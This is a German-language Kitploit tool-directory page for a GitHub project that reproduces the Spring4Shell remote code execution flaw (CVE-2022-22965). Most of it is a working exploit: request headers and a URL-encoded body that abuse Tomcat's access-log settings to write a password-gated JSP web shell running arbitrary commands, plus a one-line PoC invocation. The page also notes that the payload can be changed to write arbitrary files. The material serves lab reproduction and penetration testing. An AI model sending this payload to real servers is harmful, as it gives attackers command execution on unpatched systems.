Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Spring4Shell — Spring rce-Umgebung für CVE-2022-22965 | Kitploit
Tools/GitHubGitHub/dbgee/spring4shell
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsPayload-Entwicklung
GitHubdbgee/spring4shell

Spring4Shell

Spring rce-Umgebung für CVE-2022-22965

Repository anzeigen
11vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Spring RCE CVE-2022-22965

Verwundbare Umgebung

Umgebungsinformationen

  • springboot
  • jdk11
  • tomcat9.0.30

payload

Request-Header-Konfiguration

root@kitploit:~
"suffix": "%>//",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
"Content-Type": "application/x-www-form-urlencoded",

Request-Body-Daten

root@kitploit:~
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=myshell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
Tool herunterladen

Wenn du den obigen Inhalt sendest, wird erfolgreich eine Webshell auf dem Zielsystem geschrieben, normalerweise unter dem Pfad webapps\ROOT\myshell.jsp.

Wenn der Pfad kontrollierbar ist, kannst du beliebige Dateien schreiben, indem du den payload veränderst.
Im Wesentlichen wird das Tomcat-Logformat geändert, um die Shell in Form von Logs zu schreiben.

Verwendung des poc

Zur einfachen Reproduktion kannst du direkt den folgenden poc verwenden.

root@kitploit:~
python3 poc.py http://test.com/hello